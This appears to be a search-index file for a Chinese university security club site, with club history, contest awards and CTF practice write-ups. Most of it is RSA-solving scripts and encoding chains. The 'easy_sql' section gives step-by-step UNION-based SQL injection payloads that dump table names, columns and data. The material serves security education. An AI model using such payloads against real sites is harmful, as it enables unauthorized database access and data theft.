    \u539f\u6765\u53ea\u662f\u60f3\u7ed9\u6211\u4eec\u5b66\u6821\u548c\u96c6\u5927\u7684\u5b66\u5f1f\u4eec\u4f53\u9a8c\u6bd4\u8d5b\u7684\uff0c\u4e0d\u8fc7\u5bf9\u5916\u5f00\u653e\u4e5f\u5438\u5f15\u4e86\u8bb8\u591a\u5e08\u5085\u4eec\u6765\u505a\u9898\uff0c\u867d\u7136\u8fd0\u7ef4\u5f97\u5f88\u7d2f\uff0c\u4f46\u4e5f\u5b66\u5230\u4e86\u5f88\u591a\u4e1c\u897f\uff08\u4e3b\u8981\u662f\u975e\u9884\u671f\u548c\u90e8\u7f72\u5404\u79cd\u5947\u8469\u73af\u5883\uff09 \u6253\u4e00\u6ce2\u5e7f\u544a\uff0chttp://www.moctf.com/ MOCTF\u5e73\u53f0\u662fCodeMonster\u548cMokirin\u8fd9\u4e24\u652fCTF\u6218\u961f\u6240\u642d\u5efa\u7684\u4e00\u4e2aCTF\u5728\u7ebf\u7b54\u9898\u7cfb\u7edf\u3002\u9898\u76ee\u5f62\u5f0f\u4e0e\u5404\u5927CTF\u6bd4\u8d5b\u76f8\u540c\u3002\u76ee\u7684\u662f\u4e3a\u4e24\u4e2a\u5b66\u6821\u4e2d\u70ed\u7231\u4fe1\u606f\u5b89\u5168\u7684\u540c\u5b66\u4eec\u63d0\u4f9b\u4e00\u4e2a\u5237\u9898\u7684\u5e73\u53f0\uff0c\u80fd\u591f\u4e00\u8d77\u5b66\u4e60\u3001\u8fdb\u6b65\u3002

    \u6700\u540e\u795d\u5927\u5bb6\u65b0\u5e74\u5feb\u4e50\uff01

    ","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/ab21d401-10e1-4021-9936-e7154fd9ed71/","title":"\u4e3e\u529e\u7b2c\u4e8c\u5c4a\u53a6\u95e8\u7406\u5de5\u201c\u56fd\u79d1-i\u6625\u79cb\u676f\u201d\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u5927\u8d5b","text":"

    \u4e3a\u5e2e\u52a9\u5b66\u751f\u66f4\u597d\u5730\u611f\u77e5\u3001\u4e86\u89e3\u8eab\u8fb9\u7684\u7f51\u7edc\u5b89\u5168\u98ce\u9669\uff0c\u589e\u5f3a\u7f51\u7edc\u5b89\u5168\u610f\u8bc6\uff0c\u666e\u53ca\u7f51\u7edc\u5b89\u5168\u77e5\u8bc6\uff0c\u63d0\u9ad8\u7f51\u7edc\u5b89\u5168\u9632\u62a4\u6280\u80fd\uff0c\u53a6\u95e8\u7406\u5de5\u5b66\u9662\u8ba1\u7b97\u673a\u4e0e\u4fe1\u606f\u5de5\u7a0b\u5b66\u9662\u7279\u6b64\u4e3e\u529e\u201c\u56fd\u79d1-i\u6625\u79cb\u676f\u201d\u7b2c\u4e8c\u5c4a\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u5927\u8d5b\uff0c\u4ee5\u6b64\u6380\u8d77\u5b66\u751f\u201c\u5171\u5efa\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u3001\u5171\u4eab\u7f51\u7edc\u6587\u660e\u5b66\u6821\u201d\u7684\u70ed\u6f6e\u3002

    ","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/b6adcea6-60ce-4f44-9389-2a06d34125d8/","title":"\u201c\u767e\u8d8a\u676f\u201d\u7b2c\u56db\u5c4a\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b \u4e00\u7b49\u5956","text":"

    \u4e3a\u8d2f\u5f7b\u843d\u5b9e\u4e2d\u592e\u7f51\u4fe1\u529e\u7b49\u516d\u90e8\u95e8\u300a\u5173\u4e8e\u52a0\u5f3a\u7f51\u7edc\u5b89\u5168\u5b66\u79d1\u5efa\u8bbe\u548c\u4eba\u624d\u57f9\u517b\u7684\u610f\u89c1\u300b\uff08\u4e2d\u7f51\u529e\u53d1\u6587\u30142016\u30154\u53f7\uff09\u7cbe\u795e\uff0c\u52a0\u5feb\u9ad8\u6821\u7f51\u7edc\u5b89\u5168\u5b66\u79d1\u4e13\u4e1a\u5efa\u8bbe\uff0c\u521b\u65b0\u7f51\u7edc\u5b89\u5168\u4eba\u624d\u57f9\u517b\u673a\u5236\uff0c\u7701\u6559\u80b2\u5385\u3001\u7701\u7f51\u5b89\u529e\u51b3\u5b9a\u8054\u5408\u4e3e\u529e\u7b2c\u4e09\u5c4a\u201c\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u201d\u3002

    \u672c\u534f\u4f1a\u6d3e\u51fa\u7684CodeMonster\u6218\u961f\u5168\u7701\u7b2c\u4e8c\u593a\u5f97\u4e8c\u7b49\u5956\u3002

    ","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/bb168e48-791c-4a1d-83c4-335b9db12499/","title":"2018 \u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u798f\u5efa\u8d5b\u533a \u4e00\u7b49\u5956\uff08\u7b2c2\u540d\uff09","text":"

    2018\u5e745\u670811\u65e5\uff0c\u7531\u6559\u80b2\u90e8\u5b66\u6821\u89c4\u5212\u5efa\u8bbe\u53d1\u5c55\u4e2d\u5fc3\u3001\u4e2d\u56fd\u4fe1\u606f\u5b89\u5168\u6d4b\u8bc4\u4e2d\u5fc3\u4e3b\u529e\uff0c\u6559\u80b2\u90e8\u9ad8\u7b49\u5b66\u6821\u4fe1\u606f\u5b89\u5168\u4e13\u4e1a\u6559\u5b66\u6307\u5bfc\u59d4\u5458\u4f1a\u534f\u529e\uff0c\u4e2d\u56fd\u4fe1\u606f\u4ea7\u4e1a\u5546\u4f1a\u4fe1\u606f\u5b89\u5168\u4ea7\u4e1a\u5206\u4f1a\u3001\u5317\u4eac\u897f\u666e\u9633\u5149\u6559\u80b2\u79d1\u6280\u80a1\u4efd\u6709\u9650\u516c\u53f8\u3001\u798f\u5dde\u5927\u5b66\u627f\u529e\u76842017-2018\u5168\u56fd\u9ad8\u6821\u201c\u897f\u666e\u676f\u201d\u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u7b2c\u4e03\u5206\u533a\u8d5b\u5728\u798f\u5dde\u5927\u5b66\u62c9\u5f00\u5e37\u5e55\uff0c\u6709\u6765\u81ea\u798f\u5efa\u5171\u8ba121\u6240\u9ad8\u6821\u8fd1100\u540d\u5b66\u751f\u540c\u573a\u7ade\u6280\u3002\u7ecf\u8fc7\u4e00\u5929\u7684\u7cbe\u5f69\u89d2\u9010\uff0c\u798f\u5efa\u519c\u6797\u5927\u5b66\u529b\u514b\u7fa4\u96c4\uff0c\u593a\u5f97\u7b2c\u4e03\u8d5b\u533a\u51a0\u519b\uff0c\u53a6\u95e8\u7406\u5de5\u5b66\u9662\u3001\u95fd\u5357\u5e08\u8303\u5927\u5b66\u5206\u522b\u83b7\u5f97\u4e9a\u519b\u548c\u5b63\u519b\u3002

    "},{"location":"posts/dfd03705-8ad1-420f-8534-0fd4086165e7/","title":"2017 XNUCA\u7b2c\u4e00\u671fWeb\u4e13\u9898 \u7b2c9\u540d","text":"

    \u201c\u5168\u56fd\u9ad8\u6821\u7f51\u5b89\u8054\u8d5b(National University Cybersecurity Association\uff0c\u7b80\u79f0X-NUCA)\u201d\u662f\u9762\u5411\u5168\u56fd\u9ad8\u6821\u5b66\u751f\u7684\u7f51\u7edc\u5b89\u5168\u6280\u80fd\u7ade\u8d5b\uff0c\u9996\u5c4a\u6bd4\u8d5b\u5df2\u4e8e2016\u5e747\u670831\u65e5\u4e3e\u529e\uff0c\u5927\u8d5b\u79c9\u627f\u201c\u5bd3\u5b66\u4e8e\u8d5b\uff0c\u4ee5\u8d5b\u4fc3\u5b66\u201d\u7684\u7406\u5ff5\uff0c\u63a8\u51fa\u201c\u7ade\u8d5b+\u201d\u6a21\u5f0f\uff0c\u5c06\u8d5b\u524d\u6307\u5bfc\u3001\u8d5b\u4e2d\u953b\u70bc\u548c\u8d5b\u540e\u4ea4\u6d41\u4e09\u8005\u6709\u673a\u7ed3\u5408\uff0c\u65e8\u5728\u66f4\u597d\u5730\u4fc3\u8fdb\u56fd\u5bb6\u7f51\u7edc\u5b89\u5168\u4eba\u624d\u7684\u57f9\u517b\u548c\u9009\u62d4\u3002 X-NUCA\u8054\u8d5b\u9762\u5411\u5168\u56fd\u5728\u6821\u5b66\u751f\uff0c\u5305\u62ec\u4e13\u79d1\u751f\u3001\u672c\u79d1\u751f\u3001\u7855\u58eb\u751f\u548c\u535a\u58eb\u751f\uff0c\u9700\u7531\u6307\u5bfc\u8001\u5e08\u5e26\u961f\u53c2\u8d5b\u30022017\u8d5b\u5b63\u5206\u4e3a\u4e13\u9898\u8d5b\u548c\u603b\u51b3\u8d5b\u4e24\u4e2a\u9636\u6bb5\uff0c\u9996\u6b21\u4e13\u9898\u8d5b2017\u5e748\u670826\u65e5\u4e3e\u529e\u3002\u4e13\u9898\u8d5b\u5305\u542b3\u671f\u7ebf\u4e0a\u8d5b\uff0c\u5206\u522b\u57288\u670826\u65e5\u300110\u67088\u65e5\u300111\u670825\u65e5\u4e3e\u529e\uff0c12\u6708\u4e3e\u529e\u603b\u51b3\u8d5b\u5e76\u9881\u5956\u3002 X-NUCA\u8054\u8d5b\u63a8\u51fa\u7684\u201c\u7ade\u8d5b+\u201d\u6a21\u5f0f\u901a\u8fc7\u5f15\u5165\u8d5b\u524d\u6307\u5bfc\u548c\u8d5b\u540e\u4ea4\u6d41\u73af\u8282\uff0c\u4f7f\u53c2\u8d5b\u9009\u624b\u4e0d\u4ec5\u53ef\u4ee5\u6bd4\u8d5b\uff0c\u8fd8\u53ef\u4ee5\u6709\u9488\u5bf9\u6027\u7684\u5b66\u4e60\u3002\u5728\u201c\u7ade\u8d5b+\u201d\u6a21\u5f0f\u4e2d\uff0c\u6bd4\u8d5b\u961f\u4f0d\u5e38\u89c4\u5316\u3001\u6bd4\u8d5b\u6d3b\u52a8\u5e38\u89c4\u5316\uff0c\u7c7b\u4f3c\u4e8e\u201cNBA\u201d\u6a21\u5f0f\u3002\u5728\u8fd9\u79cd\u6a21\u5f0f\u4e0b\uff0c\u53c2\u8d5b\u961f\u4f0d\u8363\u8a89\u611f\u66f4\u5f3a\uff0c\u4eba\u624d\u7684\u5f52\u5c5e\u611f\u66f4\u5f3a\uff0c\u66f4\u5bb9\u6613\u548c\u9ad8\u6821\u6b63\u89c4\u7684\u4eba\u624d\u57f9\u517b\u4f53\u7cfb\u76f8\u7ed3\u5408\u3002X-NUCA\u8054\u8d5b\u529b\u56fe\u5c06\u7ade\u8d5b\u5e73\u53f0\u3001\u5b66\u4e60\u5e73\u53f0\u3001\u4ea4\u6d41\u5e73\u53f0\u548c\u53c2\u8d5b\u56e2\u961f\u56db\u8005\u7d27\u5bc6\u8fde\u63a5\uff0c\u52aa\u529b\u843d\u5b9e\u201c\u5bd3\u5b66\u4e8e\u8d5b\uff0c\u4ee5\u8d5b\u4fc3\u5b66\u201d\u7684\u7406\u5ff5\uff0c\u65e8\u5728\u4fc3\u8fdb\u4e2d\u56fd\u9ad8\u6821\u7f51\u5b89\u6559\u5b66\u6c34\u5e73\u7684\u63d0\u9ad8\u548c\u7f51\u5b89\u4eba\u624d\u7684\u53d1\u73b0\u3002

    \u6211\u4eec\u534f\u4f1a\u7684CodeMonster\u6218\u961f\u9996\u6b21\u53c2\u52a0\u672c\u6b21\u6bd4\u8d5b\uff0c\u53d6\u5f97\u4e86\u7ebf\u4e0a\u8d5b\u5168\u56fd\u7b2c9\u540d\u7684\u6210\u7ee9\u3002

    ","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/dfd03705-8ad1-420f-8534-0fd4086165e7/#_1","title":"\u6bd4\u8d5b\u56fe\u7247","text":"

    \u6bd4\u8d5b\u671f\u95f4\u622a\u56fe,\u4e00\u5ea6\u5360\u9886\u699c\u4e00\uff1a

    ","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/f72cbee7-1294-46b9-92e3-49a3140255b2/","title":"2017 \u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u4f01\u4e1a\u8d5b\u534e\u5357\u8d5b\u533a \u4e09\u7b49\u5956\uff08\u7b2c3\u540d\uff09","text":"

    \u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u662f\u4e00\u9879\u9762\u5411\u5927\u5b66\u751f\u7684\u516c\u76ca\u6027\u79d1\u6280\u7c7b\u7ade\u8d5b\uff0c\u7531\u4e2d\u56fd\u4fe1\u606f\u4ea7\u4e1a\u5546\u4f1a\u4fe1\u606f\u5b89\u5168\u4ea7\u4e1a\u5206\u4f1a\u53d1\u8d77\u4e3b\u529e\uff0c\u901a\u8fc7\u6574\u5408\u4fe1\u606f\u5b89\u5168\u4ea7\u4e1a\u8d44\u6e90\u5bf9\u63a5\u9ad8\u6821\uff0c\u4e3a\u5927\u5b66\u751f\u63d0\u4f9b\u4e00\u4e2a\u8fdb\u884c\u4fe1\u606f\u5b89\u5168\u6280\u672f\u521b\u65b0\u3001\u6df1\u5165\u4ea7\u4e1a\u884c\u4e1a\u5e94\u7528\u4ee5\u53ca\u6269\u5c55\u5b89\u5168\u89c6\u91ce\u7684\u5e73\u53f0\uff0c\u63a8\u52a8\u6821\u4f01\u5408\u4f5c\u6a21\u5f0f\u7684\u4fe1\u606f\u5b89\u5168\u4eba\u624d\u57f9\u517b\uff0c\u4ece\u800c\u5b9e\u73b0\u4fe1\u606f\u5b89\u5168\u4f18\u79c0\u4eba\u624d\u7684\u57f9\u517b\u548c\u9009\u62e8\u6e20\u9053\u3002

    \u5927\u8d5b\u5f3a\u8c03\u8d34\u8fd1\u5b9e\u6218\uff0c\u4ee5\u4fe1\u606f\u5b89\u5168\u5178\u578b\u884c\u4e1a\u5e94\u7528\u573a\u666f\u4e3a\u5927\u8d5b\u73af\u5883\uff0c\u91cd\u70b9\u68c0\u9a8c\u53c2\u8d5b\u5b66\u751f\u9762\u5bf9\u771f\u5b9e\u73af\u5883\u4e0b\u7684\u4fe1\u606f\u5b89\u5168\u5de5\u7a0b\u80fd\u529b\u548c\u653b\u9632\u6280\u672f\u80fd\u529b\u3002

    \u5927\u8d5b\u5f3a\u8c03\u4f01\u4e1a\u4e0e\u9ad8\u6821\u7684\u8054\u5408\uff0c\u901a\u8fc7\u6821\u4f01\u5bf9\u63a5\u7684\u4f01\u4e1a\u5bfc\u5e08\u52a0\u5b66\u751f\u6218\u961f\u7684\u6a21\u5f0f\uff0c\u5c06\u4f01\u4e1a\u8d44\u6e90\u7eb3\u5165\u5230\u9ad8\u6821\u7684\u4fe1\u606f\u5b89\u5168\u76f8\u5173\u4e13\u4e1a\u4eba\u624d\u57f9\u517b\u4e2d\uff0c\u5e76\u5b9e\u73b0\u4eba\u624d\u4ece\u9ad8\u6821\u5230\u4f01\u4e1a\u7684\u65e0\u7f1d\u5bf9\u63a5\u3002

    \u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u4e3a\u4e00\u9879\u5468\u671f\u4e3a\u4e00\u5e74\u7684\u5168\u56fd\u6027\u8054\u8d5b\u8d5b\u4e8b\uff0c\u7531\u591a\u4e2a\u533a\u57df\u5206\u7ad9\u8d5b\u548c\u5e74\u5ea6\u603b\u51b3\u8d5b\u7ec4\u6210\u3002

    \u672c\u534f\u4f1a\u7684CodeMonster\u6218\u961f\u8363\u83b7\u7b2c\u4e09\u540d\uff0c\u62ff\u4e0b\u4e09\u7b49\u59565000\u5143\u5956\u91d1\u3002

    ","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/f72cbee7-1294-46b9-92e3-49a3140255b2/#_1","title":"\u6bd4\u8d5b\u56fe\u7247","text":"

    \u83b7\u5956\u56fe\u7247\uff1a

    ","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"writeup/CISCN-CTF-Quals-2023/","title":"2023\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b\u521d\u8d5bWriteup","text":"

    11

    "}]} \ No newline at end of file +{"config":{"lang":["ja"],"separator":"[\\s\\-\uff0c\u3002]+","pipeline":["stemmer"]},"docs":[{"location":"","title":"XMUTSEC","text":"

    \u53a6\u95e8\u7406\u5de5\u5927\u5b66\u4fe1\u606f\u5b89\u5168\u534f\u4f1a\uff08XMUTSEC\uff09 - \u6210\u7acb\u4e8e\u4e8c\u3007\u4e00\u516d\u5e74\u9646\u6708\u4e5d\u65e5\u662f\u8ba1\u7b97\u673a\u5b66\u9662\u6307\u5bfc\u4e0b\u7684\u5b66\u672f\u79d1\u6280\u7c7b\u793e\u56e2\uff0c\u51e0\u4f4d\u5fd7\u540c\u9053\u5408\u7684\u5c11\u5e74\u4eba\u5728\u9e6d\u6c5f\u4e4b\u7554\u4e00\u62cd\u5373\u5408\u6210\u7acb\u4e86\u4e00\u652fCTF\u6218\u961fCodeMonster\u4e0e\u4e4b\u540c\u65f6\u8bde\u751f\u7684\u8fd8\u6709\u5723\u540e\u6eaa\u82f1\u5170\u5fb7\u7687\u5bb6\u5e7c\u513f\u56ed\u9644\u5c5e\u7406\u5de5\u5927\u5b66\u4fe1\u606f\u5b89\u5168\u534f\u4f1a\uff08\u53a6\u95e8\u7406\u5de5\u5927\u5b66\u4fe1\u606f\u5b89\u5168\u534f\u4f1a\uff09\uff0c\u534f\u4f1a\u4e3b\u8981\u7814\u7a76\u7684\u65b9\u5411\u4ee5\u5b89\u5168\u7c7b\u4e3a\u4e3b\uff0c\u6b64\u5916\uff0c\u534f\u4f1a\u4e5f\u4f1a\u7ec4\u7ec7\u5b66\u751f\u53c2\u52a0\u5b66\u672f\u7ade\u8d5b\uff0c\u4e3e\u529e\u5b66\u672f\u4ea4\u6d41\u7b49\u7b49\u3002

    \u534f\u4f1a\u5b98\u7f51\uff1ahttps://www.xmutsec.cn

    "},{"location":"#_1","title":"\u52a0\u5165\u6211\u4eec","text":"

    \u52a0\u5165\u6807\u51c6 \uff08\u6ee1\u8db3\u4ee5\u4e0b\u4e24\u4e2a\u6761\u4ef6\u5373\u53ef\uff0c\u5305\u62ec\u54c1\u884c\u7aef\u6b63\uff09 - \u54c1\u884c\u7aef\u6b63

    "},{"location":"#_2","title":"\u5b66\u4e60\u65b9\u5f0f","text":""},{"location":"award/","title":"\u8db3\u8ff9","text":""},{"location":"award/#_2","title":"\u8db3\u8ff9","text":""},{"location":"award/#_3","title":"\u4e3b\u529e","text":""},{"location":"award/#2023","title":"2023","text":"

    \uff08FUCK U, COVID-19/\ud83d\udc47\uff09

    "},{"location":"award/#2022","title":"2022","text":""},{"location":"award/#2021","title":"2021","text":"

    \uff08FUCK U, COVID-19/\ud83d\udc46\uff09

    "},{"location":"award/#2020","title":"2020","text":""},{"location":"award/#2019","title":"2019","text":""},{"location":"award/#2018","title":"2018","text":""},{"location":"award/#2017","title":"2017","text":""},{"location":"award/#2016","title":"2016","text":""},{"location":"member/","title":"\u534f\u4f1a\u6210\u5458","text":""},{"location":"member/#2021-2022","title":"2021-2022","text":""},{"location":"member/#2020-2021","title":"2020-2021","text":""},{"location":"member/#2019-2020","title":"2019-2020","text":""},{"location":"member/#2018-2019","title":"2018-2019","text":""},{"location":"member/#2017-2018","title":"2017-2018","text":""},{"location":"member/#2016-2017","title":"2016-2017","text":""},{"location":"ctfnotes/CTF-CPYPTO-2/","title":"CTF CPYPTO happy","text":"

    \u4e0b\u8f7d\u4e0b\u6765\u9644\u4ef6

    ('c=', '0x7a7e031f14f6b6c3292d11a41161d2491ce8bcdc67ef1baa9eL') ('e=', '0x872a335')

    ","tags":["\u7b2c\u4e8c\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/CTF-CPYPTO-2/#q-qp3-1285367317452089980789441829580397855321901891350429414413655782431779727560841427444135440068248152908241981758331600586","title":"q + q*p^3 =1285367317452089980789441829580397855321901891350429414413655782431779727560841427444135440068248152908241981758331600586","text":"","tags":["\u7b2c\u4e8c\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/CTF-CPYPTO-2/#qp-q-p2-1109691832903289208389283296592510864729403914873734836011311325874120780079555500202475594","title":"qp + q *p^2 = 1109691832903289208389283296592510864729403914873734836011311325874120780079555500202475594","text":"

    \u7531\u4e8e0x\u5f00\u5934\u6ca1\u6709L\uff0c\u5148\u628aL\u53bb\u6389

    \u4f7f\u7528gmpy2 \u7f16\u5199python\u811a\u672c

    import gmpy2\nimport sympy\nfrom Crypto.Util.number import *\nc = 0x7a7e031f14f6b6c3292d11a41161d2491ce8bcdc67ef1baa9e\n\ne = 0x872a335\n\nk1=1285367317452089980789441829580397855321901891350429414413655782431779727560841427444135440068248152908241981758331600586\nk2 =gmpy2.mpz(k1)\nk2=1109691832903289208389283296592510864729403914873734836011311325874120780079555500202475594\n\np=sympy.Symbol('p')\nq=sympy.Symbol('q')\nsolved_value=sympy.solve([q + q*p**3 - k1,q*p + q*p**2 -k2], [p,q])\nprint(solved_value)\np=1158310153629932205401500375817\nq=827089796345539312201480770649\n\nd = gmpy2.invert(e,(p-1)*(q-1))\nm = gmpy2.powmod(c,d,p*q)\nprint(long_to_bytes(m))\n

    \u5f97\u5230flag

    ","tags":["\u7b2c\u4e8c\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/CTF-CRYPTO-1/","title":"ez_rsa:","text":"

    \u4e0b\u8f7d\u9644\u4ef6\uff1a

    \u7528\u7f16\u5199python\u4ee3\u7801\uff0c\u56e0\u4e3aRSA\u53ef\u9006 :

    p = 1325465431\n\nq = 152317153\n\ne = 65537\n\nn = p*q\n\nL = (p-1)*(q-1)\n\nd = pow(e,-1,L)\n\nprint(d)\n

    \u89e3\u51faD=43476042047970113

    \u518d\u7ecf\u8fc7md5\u52a0\u5bc6\u5f97\u5230flag

    ","tags":["\u7b2c\u4e8c\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/CTF-CRYPTO-3/","title":"RSA\u5171\u6a21\uff1a","text":"

    \u9644\u4ef6.py\uff1a

    from gmpy2 import *\n\nfrom Crypto.Util.number import *\n\n\nflag  = '***************'\n\np = getPrime(512)\n\nq = getPrime(512)\n\nm1 = bytes_to_long(bytes(flag.encode()))\n\n\nn = p*q\n\ne1 = getPrime(32)\n\ne2 = getPrime(32)\n\nprint()\n\nflag1 = pow(m1,e1,n)\n\nflag2 = pow(m1,e2,n)\n\nprint('flag1= '+str(flag1))\n\nprint('flag2= '+str(flag2))\n\nprint('e1= ' +str(e1))\n\nprint('e2= '+str(e2))\n\nprint('n= '+str(n))\n\n\n\nflag1= 100156221476910922393504870369139942732039899485715044553913743347065883159136513788649486841774544271396690778274591792200052614669235485675534653358596366535073802301361391007325520975043321423979924560272762579823233787671688669418622502663507796640233829689484044539829008058686075845762979657345727814280\n\nflag2= 86203582128388484129915298832227259690596162850520078142152482846864345432564143608324463705492416009896246993950991615005717737886323630334871790740288140033046061512799892371429864110237909925611745163785768204802056985016447086450491884472899152778839120484475953828199840871689380584162839244393022471075\n\ne1= 3247473589\n\ne2= 3698409173\n\nn= 103606706829811720151309965777670519601112877713318435398103278099344725459597221064867089950867125892545997503531556048610968847926307322033117328614701432100084574953706259773711412853364463950703468142791390129671097834871371125741564434710151190962389213898270025272913761067078391308880995594218009110313\n

    python\u811a\u672c

    from gmpy2 import *\nfrom Crypto.Util.number import *\n\nflag1= 100156221476910922393504870369139942732039899485715044553913743347065883159136513788649486841774544271396690778274591792200052614669235485675534653358596366535073802301361391007325520975043321423979924560272762579823233787671688669418622502663507796640233829689484044539829008058686075845762979657345727814280\nflag2= 86203582128388484129915298832227259690596162850520078142152482846864345432564143608324463705492416009896246993950991615005717737886323630334871790740288140033046061512799892371429864110237909925611745163785768204802056985016447086450491884472899152778839120484475953828199840871689380584162839244393022471075\ne1= 3247473589\ne2= 3698409173\nn= 103606706829811720151309965777670519601112877713318435398103278099344725459597221064867089950867125892545997503531556048610968847926307322033117328614701432100084574953706259773711412853364463950703468142791390129671097834871371125741564434710151190962389213898270025272913761067078391308880995594218009110313\n\ndef egcd(a, b):\n  if a == 0:\n    return (b, 0, 1)\n  else:\n    g, y, x = egcd(b % a, a)\n    return (g, x - (b // a) * y, y)\ns = egcd(e1,e2)\ns1 = s[1]\ns2 = s[2]\nm = pow(flag1,s1,n)*pow(flag2,s2,n) % n\n# print(m)\nflag = long_to_bytes(m)\nprint(flag)\n

    \u6c42\u5f97NSSCTF{xxxxx**xxxxx}

    ","tags":["\u7b2c\u4e8c\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/CTF-CRYPTO-4/","title":"[\u7f8a\u57ce\u676f 2021]Bigrsa","text":"

    \u9644\u4ef6\u63d0\u793a\uff1a\u5171\u4eab\u7d20\u6570

    from Crypto.Util.number import * from gmpy2 import *

    ","tags":["\u7b2c\u4e8c\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/CTF-CRYPTO-4/#from-flag-import","title":"from flag import *","text":"
    from Crypto.Util.number import *\nfrom flag import *\n\nn1 = 103835296409081751860770535514746586815395898427260334325680313648369132661057840680823295512236948953370895568419721331170834557812541468309298819497267746892814583806423027167382825479157951365823085639078738847647634406841331307035593810712914545347201619004253602692127370265833092082543067153606828049061\nn2 = 115383198584677147487556014336448310721853841168758012445634182814180314480501828927160071015197089456042472185850893847370481817325868824076245290735749717384769661698895000176441497242371873981353689607711146852891551491168528799814311992471449640014501858763495472267168224015665906627382490565507927272073\ne = 65537\n\n# m = bytes_to_long(flag)\n\n# c = pow(m, e, n1)\n\n# c = pow(c, e, n2)\n\n# print(\"c = %d\" % c)\n\n# output\n\nc = 60406168302768860804211220055708551816238816061772464557956985699400782163597251861675967909246187833328847989530950308053492202064477410641014045601986036822451416365957817685047102703301347664879870026582087365822433436251615243854347490600004857861059245403674349457345319269266645006969222744554974358264\n

    \u7f16\u5199\u811a\u672c

    from Crypto.Util.number import *\nfrom gmpy2 import *\n# from flag import *\n\nn1 = 103835296409081751860770535514746586815395898427260334325680313648369132661057840680823295512236948953370895568419721331170834557812541468309298819497267746892814583806423027167382825479157951365823085639078738847647634406841331307035593810712914545347201619004253602692127370265833092082543067153606828049061\nn2 = 115383198584677147487556014336448310721853841168758012445634182814180314480501828927160071015197089456042472185850893847370481817325868824076245290735749717384769661698895000176441497242371873981353689607711146852891551491168528799814311992471449640014501858763495472267168224015665906627382490565507927272073\ne = 65537\n# m = bytes_to_long(flag)\n# c = pow(m, e, n1)\n# c = pow(c, e, n2)\n\n# print(\"c = %d\" % c)\n\n# output\nc = 60406168302768860804211220055708551816238816061772464557956985699400782163597251861675967909246187833328847989530950308053492202064477410641014045601986036822451416365957817685047102703301347664879870026582087365822433436251615243854347490600004857861059245403674349457345319269266645006969222744554974358264\n\np=GCD(n1,n2)\nq1=n1//p\nq2=n2//p\n\nphi1=(p-1)*(q1-1)\nphi2=(p-1)*(q2-1)\n\nd1=gmpy2.invert(e,phi1)\nd2=gmpy2.invert(e,phi2)\nc1=pow(c,d2,n2)\nm=pow(c1,d1,n1)\nflag = long_to_bytes(m)\nprint(flag)\n

    \u5f97flag\uff1a

    SangFor{qSccmm1WrgvIg2Uq_cZhmqNfEGTz2GV8}

    ","tags":["\u7b2c\u4e8c\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/CTF-CRYPTO-5/","title":"[\u9e64\u57ce\u676f 2021]A_CRYPTO","text":"

    4O595954494Q32515046324757595N534R52415653334357474R4N575955544R4O5N4Q46434S4O59474253464Q5N444R4Q51334557524O5N4S424944473542554O595N44534O324R49565746515532464O49345649564O464R4R494543504N35

    \u5148rot 13

    \u5f974B595954494D32515046324757595A534E52415653334357474E4A575955544E4B5A4D46434F4B59474253464D5A444E4D51334557524B5A4F424944473542554B595A44534B324E49565746515532464B49345649564B464E4E494543504A35

    \u518dbase16

    KYYTIM2QPF2GWYZSNRAVS3CWGNJWYUTNKZMFCOKYGBSFMZDNMQ3EWRKZOBIDG5BUKYZDSK2NIVWFQU2FKI4VIVKFNNIECPJ5

    \u518dbase32

    V143Pytkc2lAYlV3SlRmVXQ9X0dVdmd6KEYpP3t4V29+MElXSER9TUEkPA==

    \u518dbase64

    \u5f97W^7?+dsi@bUwJTfUt=_GUvgz(F)?{xWo~0IWHD}MA$<

    \u6700\u540e\u5728https://gchq.github.io/CyberChef/\u4e0a\u8f6cbase85

    \u5f97

    ","tags":["\u7b2c\u4e8c\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/CTF-WEB-2/","title":"easy_sql","text":"

    title\u63d0\u793a\u53c2\u6570\u662fwllm

    order by\u67e5\u770b\u6709\u51e0\u5217

    \u5f97\u52303\u5217

    \u6539wllm=-1

    ?wllm=-1\u2019 union select 1,2,3 --+

    \u5f97\u52302,3

    ?wllm=-1' union select 1,2,database()--+

    ?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+

    ?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='test_tb'--+

    /?wllm=-1' union select 1,2,group_concat(id,flag) from test_tb--+

    \u5f97\u5230flag

    ","tags":["\u7b2c\u4e00\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/CTF-Web-1/","title":"CTF WEB wp-1","text":"","tags":["\u7b2c\u4e00\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/CTF-Web-1/#do_you_konw_http","title":"Do_you_konw_http","text":"

    \u63d0\u793a\u4fee\u6539user agent \u4e3aWLLM

